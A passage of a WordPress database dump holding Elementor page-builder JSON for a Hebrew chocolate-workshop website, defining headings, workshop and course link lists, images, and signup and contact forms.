\\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea!\\\"\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":27},\"typography_font_weight\":\"400\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"17\",\"bottom\":\"0\",\"left\":\"17\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"25\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"25\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"typography_font_style\":\"italic\",\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c25e365\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26},\"typography_font_weight\":\"normal\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_text_color\":\"#40272c\",\"background_color\":\"#edd0a8\",\"border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"50\",\"bottom\":\"20\",\"left\":\"50\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"15\"},\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#5c0011\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A6%D7%A8%D7%95-%D7%A7%D7%A9%D7%A8\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"43f8ef8f\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"39181ab4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"10694622\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5212b57b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"2b9dc682\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"50c468d5\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"45bcecca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"37f8a4fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"285e10d7\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"24484b98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"33814887\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"48098d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f32a997\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"\\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4?\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(524,120,'_elementor_version','0.4'),(528,121,'_wp_page_template','elementor_canvas'),(529,121,'_elementor_edit_mode','builder'),(530,121,'_elementor_template_type','post'),(531,121,'_elementor_data','[{\"id\":\"3d7689b8\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"570504a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"4fadbe7\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"376ec0e9\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"2a6711cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"66f452c6\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e94e72f\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"vh\",\"size\":\"60\"},\"column_position\":\"stretch\",\"background_background\":\"classic\",\"background_image\":{\"id\":35,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/HDR.jpg\"},\"background_position\":\"center center\",\"background_size\":\"cover\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"25\",\"bottom\":\"40\",\"left\":\"25\",\"isLinked\":false}},\"elements\":[{\"id\":\"3b866986\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"rgba(255,255,255,0.73)\",\"margin\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"63\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"53\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c8a61fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":33,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\"},\"space\":{\"unit\":\"%\",\"size\":18},\"_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"_background_background\":\"classic\",\"_background_color\":\"#f1d5ad\",\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1f909fe7\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d8\\u05e2\\u05d5\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d0\\u05d9\\u05db\\u05d5\\u05ea\\u05d9 \\u05d1\\u05d9\\u05d5\\u05dd \\u05d0\\u05d7\\u05d3 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"45\"},\"typography_font_weight\":\"100\",\"typography_line_height\":{\"unit\":\"em\",\"size\":\"0.9\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"38\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"35\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"10\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"35481412\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4\",\"align\":\"center\",\"title_color\":\"#40272c\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":\"22\"},\"typography_font_weight\":\"bold\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"20\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"18\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41e0dd23\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"_id\":\"eovd5tr\",\"required\":\"true\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"eovd5tr\"},{\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"_id\":\"68frv7y\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"68frv7y\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"width\":\"100\",\"_id\":\"p0rl9g7\",\"required\":\"\",\"field_options\":\"\",\"inline_list\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"field_html\":\"\",\"custom_id\":\"p0rl9g7\"}],\"show_labels\":\"\",\"button_text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"success_message\":\"The message was sent successfully!\",\"error_message\":\"There\'s something wrong... Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong... The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":\"10\"},\"row_gap\":{\"unit\":\"px\",\"size\":\"15\"},\"field_text_color\":\"#54595f\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_typography_typography\":\"custom\",\"button_typography_font_weight\":\"bold\",\"button_typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_background_color\":\"#5c0011\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":false},\"field_typography_typography\":\"custom\",\"field_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"13\"},\"button_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"14\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"22\",\"bottom\":\"22\",\"left\":\"22\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"button_background_hover_color\":\"#40272c\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea 